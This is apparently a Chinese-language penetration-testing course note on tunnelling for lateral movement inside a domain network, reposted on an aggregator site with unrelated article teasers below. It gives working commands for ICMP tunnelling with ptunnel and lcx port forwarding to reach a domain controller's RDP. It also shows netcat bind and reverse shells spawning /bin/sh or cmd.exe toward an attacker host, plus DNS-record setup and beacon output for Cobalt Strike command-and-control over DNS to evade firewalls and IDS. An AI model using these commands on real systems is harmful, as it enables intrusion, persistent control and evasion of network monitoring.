71 内网安全-域横向网络传输应用层隧道技术

目录

    • 必备知识点:
      • 1.代理和隧道技术区别?
      • 2.隧道技术为了解决什么?
      • 3.隧道技术前期的必备条件?
    • 演示案例:
      • 网络传输应用层检测连通性-检测
      • 网络层ICMP隧道Ptunnel使用-检测利用
      • 传输层转发隧道Portmap使用-检测,利用
      • 传输层转发隧道Netcat使用-检测,利用,功能
      • 应用层DNS隧道配合CS上线-检测,利用,说明
    • 涉及资源

在这里插入图片描述

必备知识点:

1.代理和隧道技术区别?

代理只是为了解决网络的访问问题,在代理之上多了个过滤的绕过,就是隧道

2.隧道技术为了解决什么?

防火墙对流量进行监控,有些协议他是放行的,这个时候可以伪装成放行协议来进行绕过,就是同样的东西以协议转换实现绕过,隧道主要是做这个用的,可以理解为单独的通道来传输之前被拦截的东西

CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等,这些问题出现之后,就必须用到隧道技术

隧道技术通常在我们的真实红蓝对抗比赛中,蓝队会部署入侵检测系统、流量监控的东西,如果它设置上面设置了一些东西之后,可能拖一些东西的时候就会被检测到,这个时候出口数据就会向外部发,那么这个东西一旦被监控到,就会被拦截

3.隧道技术前期的必备条件?

在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截

我们已经获得控制权,但是你不能对控制的东西进行一些信息收集,或者用它上面的东西来执行

我们通过shiro反序列化漏洞,拿到了一个权限,但是那个漏洞上面有ids,它上不了线,就是它把后门用反序列化代码执行了,上不了线,就是服务端无法被控制,这个时候就属于隧道技术的应用场景
你已经取得了一些权限,但是权限不能完整的去展示给你,我们大部分会把它执行到CS和MSF上线,因为这样子就便于你去管理这台服务器或者操作
单纯的漏洞,我们要把它转换成最好理解的UI界面,控制端的程序去控制这台服务器
我们已经获得权限,但是这个权限在转接给你,你在控制的时候,有很多的不方便,但是你又想得到这个东西,或者说更方便的去操作,就会出现隧道技术帮你解决这个问题,所以它不是一种攻击方式,它只是获取到权限之后,为了更方便的去控制和传输,绕过一些防火墙的拦截,操作不会出现异常,监控各种各样的问题,它是为了解决这个事情产生的,它和代理有不一样的地方,代理只是为了解决网络的通讯问题,而他在是在它的基础上又多了一些东西

在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢? 这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
常用的隧道技术有以下三种:
网络层: IPv6 隧道、ICMP 隧道
传输层: TCP 隧道、UDP 隧道、常规端口转发
应用层: SSH 隧道、HTTP/S 隧道、DNS 隧道

我们会从这三个层面抽一个去讲,就是隧道协议在通讯层的第几层

演示案例:

网络传输应用层检测连通性-检测

1.TCP 协议
用"瑞士军刀"–netcat
执行 nc 命令: nc <端口>
2.HTTP 协议
用"curl"工具,执行curl <IP地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的话,就会输出相应的端口信息
3.ICMP 协议
用"ping"命令,执行ping <IP地址/域名>
4.DNS 协议
检测DNS连通性常用的命令是"nslookup"和"dig"
nslookup 是windows自带的DNS探测命令
dig是linux系统自带的DNS探测命令

探测它的协议是否支持,能不能正常的通讯
看它的命令是不是有正常数据的回连,或者说是否支持这个协议的传输,这个协议能够向外部发送数据,向内部的探针,这个协议是正常的,那么你才能用这个隧道,所以在用隧道之前,要去探针一下对应隧道的协议是否是支持的,如果不支持你用这个隧道是没有任何意义的
有些协议测试用命令执行不行,要用工具去测试

网络层ICMP隧道Ptunnel使用-检测利用

kali2020-Target2-Target3
pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具
-p ##表示连接icmp隧道另一端的机器IP (即目标服务器)
-lp ##表示需要监听的本地tcp端口
-da ##指定需要转发的机器的IP (即目标内网某一机器的内网IP)
-dp ##指定需要转发的机器的端口 (即目标内网某一机器的内网端口)
-x ##设置连接的密码

Webserver: ./ptunnel -x xiaodi
Hacker xiaodi: ./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080
Hacker xiaodi: rdesktop 127.0.0.1 1080

老版本介绍: https://github.com/flvefour/ptunnel (需自行编译)
新版本介绍: https://github.com/esrrhs/pingtunnel (二次开发版)

在这里插入图片描述
通过web主机,实现对dc的控制,现在DC上面有防护的策略,这个时候我们先用前期的ICMP策略是否支持,然后再去测试它
在这里插入图片描述
这个时候是支持ICMP协议的,我们用相关的命令去探针隧道可不可行,就是要看它数据能不能正常通讯
这个时候,我们就可以利用隧道来实现操作,用我的计算机去连接DC,已知我得到DC上面的账号密码,我希望我通过我的计算机连接到DC,很明显,我的计算机无法连接到DC的,因为不是一个网段
ptunnel是老牌的工具,我是不推荐大家使用的,大家可以去用新版本pingtunnel,pingtunnel所有的操作都是支持的,而且功能相对老版本要好一些
操作之前,我们先要判断一下隧道可不可行
因为tcp/udp/sock5协议受到了防火墙和这个工具的拦截,所以这个工具就是解决拦截的协议,把流量封装成icmp协议上面,然后进行数据的一个传输
就是webserver自己构建一个隧道,然后密码是xiaodi,等待别人连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

假如我们自己去连接它3389,走的就是3389自带的协议,但是我用pingtunnel工具实现了一个目的,它操作的流量其实走的是ICMP的一个接口
登录进去和你之前使用远程3389去连接它是一摸一样的,只是说你现在走的流量数据不在是以前这个协议走的流量数据,它走的流量数据变成了icmp的流量数据
在这里插入图片描述
我是在做连通性的问题,但是大家更需要理解的是这个操作不一定是连通性问题,还有一个问题,我采用的是icmp隧道协议,来实现连接它的3389,就原有的3389调用窗口去连接的话,比正常时间连接,它走的数据和icmp是两码事,它可能就是tcp数据

传输层转发隧道Portmap使用-检测,利用

windows: lcx
linux: portmap
lcx -slave 攻击IP 3131 127.0.0.1 3389 //将本地3389给攻击IP的3131
lcx -listen 3131 3333        //监听3131转发至3333

在这里插入图片描述
在这里插入图片描述
假设我现在取得DC的权限了,通过会话把lcx转换一下,把端口上的数据给到3.31的6666端口,然后把自己本地的3389端口给出去,这条命令的意思是将本地的3389数据给到3.21的6666端口,然后执行
在这里插入图片描述
到webserver上监听本地的6666端口,转发至7777
在这里插入图片描述
通过kali去连接webserver的7777
在这里插入图片描述
现在我登录的就是域控的服务器
在这里插入图片描述
这个操作属于隧道技术里面的第二层传输层,端口转发的隧道里面

传输层转发隧道Netcat使用-检测,利用,功能

Kali2020-god\webserver-god\sqlserverldc
1.双向连接反弹shell
正向:攻击连接受害
受害: nc -ldp 1234 -e /bin/sh //linux
nc -ldp 1234 -e c: windows system32\cmd.exe //windows
攻击: nc 192.168.76.132 1234 //主动连接
反向:受害连接攻击
攻击: nc -lvp 1234
受害: nc 攻击主机IP 1234 -e /bin/sh
nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe
2.多向连接反弹shell-配合转发
反向:

god\Webserver: Lcx.exe -listen 2222 3333
god\sqlserver: nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
kali或本机: nc -v 192.168.76.143 3333

正向该怎么操作呢? 实战中改怎么选择正向和反向?

3.相关netcat主要功能测试

指纹服务: nc -nv 192.168.76.143
端口扫描: nc -v -z 192.168.76.143 1-100
端口监听: nc -lvp xxxx
文件传输: nc -lp 1111 >1.txt | nc -vn xx.xx.x.x 1111 <1.txt -q 1
反弹shell:见上

nc可以和我们的攻击实时挂钩,nc最新版有-e参数,旧版没有这个参数,很多都会受限,它被称为瑞士军刀就是因为在利用的时候非常方便
我们反弹会话、反弹命令或者说操作连接,是有很多方式的,不是说单纯的CS控制端,在上面执行命令,就是有很多方法去帮助你实现控制,而且可以利用多种协议去实现,因为在实战情况下,我们会有很多协议会被封堵拦截,所以我们要掌握很多种控制协议,那样子在实战中就不会掉链子
攻击机主动连接受害者,然后受害主机就把数据给到自己的1234,然后攻击机去连接它
攻击主机监听自己的1234,然后受害主机就主动的把数据发给攻击机
根据网络情况选择是用正向还是反向,比如受害主机能够找到你,你就用反向,受害主机找不到你,你就用正向

在webserver上监听自己的2222端口给到自己的3333端口
在这里插入图片描述

主动把自己的cmd给到3.31的2222端口
在这里插入图片描述

kali连接webserver上的另外一个接口,76网段3333,直接反弹个cmd出来
在这里插入图片描述
这就是个典型的端口反弹计划
在这里插入图片描述
nc走的是tcp协议,也就是说对方没有过滤这个TCP协议的话,这个时候可以用nc实现与控制主机的通讯,来实现控制,但是利用nc工具也只能反弹个cmd,并不能看到图形化的界面,也不能对它的东西进行操作,到时候还是要利用一些木马来实现控制,配合进行操作
nc是在linux和windows上通用的工具,它还可以进行指纹服务、端口扫描、端口监听、文件传输、反弹shell

nc具体参数的含义你可以去网上看一下具体的含义,nc是一款非常好用的内网工具,配合lcx端口转发能实现很多操作

应用层DNS隧道配合CS上线-检测,利用,说明

当常见协议监听器被拦截时,可以换其他协议上线,其中dns协议上线基本通杀
1.云主机Teamserver配置端门53启用-udp
2.买一个域名修改解析记录如下:
A记录->cs主机名->CS服务器IP
NS记录->ns1主机名->上个A记录地址
NS记录->ns2主机名->上个A记录地址
3.配置DNS监听器内容如下:
ns1.xiaodi8.com
ns2.xiaodi8.com
cs.xiaodi8.com
4生成后门执行上线后启用命令

beacon> checkin[*]
Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home, sent: 8 bytes
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 53 bytes
[+] received output:

应用层是在实战中经常会遇到的问题,之前两个层面可能会经常被防火墙拦截,网络层、传输层
在这里插入图片描述
监听器就是管道、隧道的意思,它这个木马在实现控制的时候,我们常见的就是用http生成,假设说http协议,对方是流量监控的,就是说防火墙上面有检测HTTP的,数据在HTTP协议上面传输数据的时候,它会被监控,假设说你现在用beacon http生成的后门,然后上线,那肯定会有问题,因为它已经封堵HTTP了,你流量数据还是采用它进行传递,那么你生成的后门还是绑定HTTP协议,这个时候肯定有问题
有时候我们用CS生成后门,上不了线的原因,其中就有这个情况,我们生成后门不是要绑定监听器,我们用监听器绑定HTTP协议的,那么它就相当于走的是HTTP协议的,那么生成的后门就是走这个协议
在这里插入图片描述
防火墙会选择性拦截的,它如果拦截HTTP的话,那你就走其它协议,直接上线
常规都是使用HTTP,因为你用DNS你会发现它比HTTP速度要慢,没有HTTP好使,因为好使的话,它在你创建监听器的话,它就不会默认给到你HTTP,因为HTTP速度最快,最好使,但是如果它被封堵了,那你就只能选择其它协议,同样的道理,如果DNS封堵,你就走HTTPS或者其它的协议,像这些都是官方自带的协议走法,你从网站下载CS的插件之后,你这边还可以多加几个协议出来
dns为域名解析用的,通过域名还原成IP,这种协议一般不会被防火墙或者其它东西拦截,因为它这个是很正常的功能,只是说这上面会走些数据,dns协议能很好处理那些不能上线的情况,就相当于数据通过DNS协议把数据给给出去,就不会受到防护软件的拦截
用阿里云的服务器老是有端口的拦截,你需要在安全组配置一下
修改域名解析记录
在这里插入图片描述
配置DNS监听器内容
在这里插入图片描述
这个时候就生成后门,选择DNS上线
在这里插入图片描述
上传到webserver执行
在这里插入图片描述
一定要注意dns上线就是这么个情况,DNS上线有个问题,就是速度特别慢,dns有个过程,就是它发送数据会有个发送和响应的过程,就好比你去ping一个网站域名,它会响应一个IP地址,它不是说是实时的,不是说传过去,它就回给你,它这个就相当于你发过去,对方在回你,而不是说你发过去就完了,于此同时你还要实现几条命令,才能实现控制
建立类似的通道
在这里插入图片描述
DNS上线,它的利用是建立这种有防火墙的时候,就是这个主机在防火墙里面,它可以通过控制主机
这个大概要等个10s、20s,它主要是看主机和DNS服务器通讯的速度问题
在这里插入图片描述
速度太慢了,它好处很多,坏处也很多,电脑主机上面有闪电,表示说他上面是有些防护的
在这里插入图片描述
隧道的意义是,你打之前,你对它进行测试的时候,你采用的测试方法和协议不一样,那个协议在测试的过程中有可能被拦截的,那么被拦截的话,就需要换一种方法去测试它
比如说它上面有个网站,它的网站是HTTP协议,假如说你知道这个网站有漏洞,但是你攻击不了它,因为你访问它老断断续续,突然间崩了或者怎么样,直接访问不到,原因就是很简单,要么对方禁止你的IP访问,或者说检测到你访问有异常,那这个时候你直接用工具去扫描,去搞的话,你走的通通是我们常说的HTTP协议,所以我们可以把这个协议换成其它协议去封装,就是走其它协议来实现攻击,就是以前通讯走的协议,可以通过隧道之后,可以变换另外一种协议,就跟CS上线一个道理,之前你都是HTTP协议上线的,然后HTTP协议上线不了,你就可以换一种DNS协议,而且网上还有插件,插件里面还可以帮我们多加几个,我们在对抗中,经常用到CS,东西都是属于协议方面的东西,都是为解决通讯上面被拦截的情况
在这里插入图片描述
网上看的文章呀,一些乱七八糟的,都是我们今天讲的隧道里面要解决的问题,隧道技术其实就是我们不断变换协议,走不同协议实现数据通讯,今天讲的只是隧道技术里面抽了一个出来讲

我们今天做的实验只是告诉你,它的这个形式,不是说一定要你掌握工具的使用,当然掌握也是很有必要的,因为我们后面也会经常用到这些工具,但是你更要明白你学了这些实验之后,你明白的道理,这些实验在干吗,它为解决什么事情,这一点是最需要明白的,就是它的利用场景

涉及资源

https://github.com/f1vefour/ptunnel
https://github.com/esrrhs/pingtunne
https://github.com/MrAnonymous-1/Icx
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码: xiao

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/121452.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

网站小程序分类目录网源码系统+会员登录注册功能 带完整搭建教程

大家好啊&#xff0c;源码小编今天来给大家分享一款网站小程序分类目录网源码系统会员登录注册功能 。 以下是核心代码图模块&#xff1a; 系统特色功能一览&#xff1a; 分类目录&#xff1a;系统按照不同的类别对网站进行分类&#xff0c;方便用户查找自己需要的网站。用户可…

K8S篇之etcd数据备份与恢复

一、etcd备份与恢复 基本了解&#xff1a; 1、k8s 使用etcd数据库实时存储集群中的数据&#xff0c;安全起见&#xff0c;一定要备份。 2、备份只需要在一个节点上备份就可以了&#xff0c;每个节点上的数据是同步的&#xff1b;但是数据恢复是需要在每个节点上进行。 3、etcd…

门窗定制服务预约小程序效果如何

无论建筑工程还是普通家庭&#xff0c;都有门窗订购需求&#xff0c;对商家来说&#xff0c;不断传播品牌、获客转化是首要的&#xff0c;然而在实际经营中门窗生意也会面临一些痛点&#xff1a; 1、品牌宣传拓客难 门窗生意同行较多&#xff0c;而且传单等形式低效且不太适用…

【原创】java+swing+mysql宠物领养管理系统设计与实现

摘要&#xff1a; 生活中&#xff0c;有很多被人遗弃的宠物&#xff0c;这些宠物的处理成为了一个新的难题。生活中也有许多人喜欢养宠物&#xff0c;为了方便大家进行宠物领养&#xff0c;提高宠物领养管理的效率和便利性。本文针对这一问题&#xff0c;提出设计和实现一个基…

环形链表~

题目描述 给你一个链表的头节点 head &#xff0c;判断链表中是否有环。如果链表中存在环&#xff0c;则返回true。否则&#xff0c;返回false 。 解题思路 采用快慢指针的思想&#xff0c;创建fast和slow一快一慢指针&#xff0c;slow一次走一步&#xff0c;fast一次走两步&…

使用Redis实现文章阅读量、收藏、点赞数量记录功能

目录 一、前言二、业务分析三、Redis数据结构选择分析和实现3.1、三个数据缓存都分别使用 字符串 结构计数器存储对应数量值3.2、三个数据缓存使用一个 Hash 结构存储3.3、阅读量使用字符串结构计算器&#xff0c;收藏和点赞分别使用 Set 集合存储 四、总结 一、前言 在博客中会…

chrome v3开发插件实现所有网站允许跨域

场景&#xff1a; chrome 插件 升级到v3后&#xff0c;原来修改请求响应都变成异步&#xff0c;即无法同步拦截来修改请求响应。 在v3中也不支持修改请求响应内容。 问题&#xff1a;如何在chrome v3中允许其他网站跨域呢。 方式一&#xff1a;禁用chrome跨域&#xff0c;禁…

5G与物联网应用:新一代网络技术融合开创新时代

5G与物联网应用&#xff1a;新一代网络技术融合开创新时代 随着信息技术的不断演进&#xff0c;5G和物联网作为新一代网络技术&#xff0c;正在引领我们走向一个更加智能化、互联互通的新时代。本文将分析5G与物联网应用的技术原理、应用场景与发展趋势&#xff0c;并探讨它们…

BES 在大规模向量数据库场景的探索和实践

导读 本文整理自 2023 年 9 月 5 日 QCon 全球软件开发大会 2023 北京站 —— 向量数据库分论坛的同名主题演讲《BES 在大规模向量数据库场景的探索和实践》。 全文5989字&#xff0c;预计阅读时间15分钟。 向量数据库是一种专门用于存储和查询向量数据的数据库系统。通过 Emb…

idea 一直卡在maven正在解析maven依赖

修改maven Importing的jvm参数 -Xms1024m -Xmx2048m

用POST请求在Linux之间传输文件(Python在Linux间传输文件)

背景 实际需求&#xff1a; 已通过iperf和dd命令测试过两台不同区域之间的Linux服务器带宽&#xff0c;均为1000Mb网络。但发送post请求传输文件至对象存储时&#xff0c;总是卡在14Mb/s。除了排查区域之间的防火墙&#xff0c;也应该尝试检查Linux&#xff08;KylinV10&…

Python中如何理解这种书写代码的语法??def cracking_passwords(zfile: ZipFile, pwd: str) -> bool:

def cracking_passwords(zfile: ZipFile, pwd: str) -> bool: # Author : 小红牛 # 微信公众号&#xff1a;wdPython这是一种使用Python的函数定义语法。这个函数被命名为cracking_passwords&#xff0c;它接受两个参数&#xff1a;zfile和pwd。参数的类型被标注为ZipFile和…

Java Swing程序设计-18章

Java Swing程序设计-18章 1.Swing概论 Swing是用于创建图形用户界面&#xff08;GUI&#xff09;的一组API&#xff08;应用程序编程接口&#xff09;。Swing提供了丰富的组件&#xff0c;用于构建用户友好的界面&#xff0c;包括按钮、文本框、标签、列表、表格等。以下是Sw…

c语言练习第10周(1~5)

根据公式求和 输入样例20输出样例 534.188884 #include<stdio.h> #include<math.h> int main() {int i,n;scanf("%d", &n);double s 0,t0;for (i 1; i < n; i) {t t sqrt(i);s s t;}printf("%.6lf", s);return 0; } 第一行输入…

Selenium爬取内容并存储至MySQL数据库

前面我通过一篇文章讲述了如何爬取博客摘要等信息。通常,在使用Selenium爬虫爬取数据后,需要存储在TXT文本中,但是这是很难进行数据处理和数据分析的。这篇文章主要讲述通过Selenium爬取我的个人博客信息,然后存储在数据库MySQL中,以便对数据进行分析,比如分析哪个时间段…

0成本LLM微调上手项目,⚡️一步一步使用colab训练法律LLM,基于microsoft/phi-1_5,包含lora微调,全参微调

项目地址 &#xff1a;https://github.com/billvsme/train_law_llm ✏️LLM微调上手项目 一步一步使用Colab训练法律LLM&#xff0c;基于microsoft/phi-1_5 。通过本项目你可以0成本手动了解微调LLM。 nameColabDatasets自我认知lora-SFT微调train_self_cognition.ipynbsel…

Python基础入门----Python虚拟环境:为何要用虚拟环境、如何使用virtualenv

文章目录 在Python开发中,虚拟环境是一个独立的目录树,可以在其中安装Python模块。每个虚拟环境都有自己的Python二进制文件和一组安装的库。使用虚拟环境的主要原因是为了避免项目间的依赖冲突,允许每个项目有其特定的依赖,而不影响全局安装的模块。 为何要用虚拟环境 依…

IntelliJ IDEA - Git Commit 后 Commit 窗口不消失解决方案

这个现象是在 2023 年版本后开始的&#xff0c;一开始以为是 Mac 系统的原因&#xff0c;后来发现原来 Windows 也这样&#xff0c;所以应该只跟 IDEA 版本有关 可以看到左侧 commit 后&#xff0c;这个侧边栏还在&#xff0c;按理讲在以前的版本是之前消失&#xff0c;这样使…

Go 语言初探:从基础到实战

1.Go概述 程序是一段计算机指令的有序组合。程序算法数据结构。任何程序都可以将模块通过三种基本的控制结构&#xff08;顺序、分支、循环&#xff09;进行组合来实现。 Go&#xff08;也称为Golang&#xff09;是一种由Google开发的开源编程语言。设计目标是使编程更简单、…

62、使用python进行rk3588开发板进行推流亚马逊云服务上,进行实时播放

基本思想:之前写了一套c++的推理和视频编解码,使用rk3588的mpp硬件进行编码和解码,然后使用RTSPServer进行推流,总是有问题,虽然可以使用ffplay和vlc进行拉取和播放,但是就是无法使用gstreamer推流到亚马逊云服务上,因为项目需求的紧急,所以先用python把流程跑同,后续…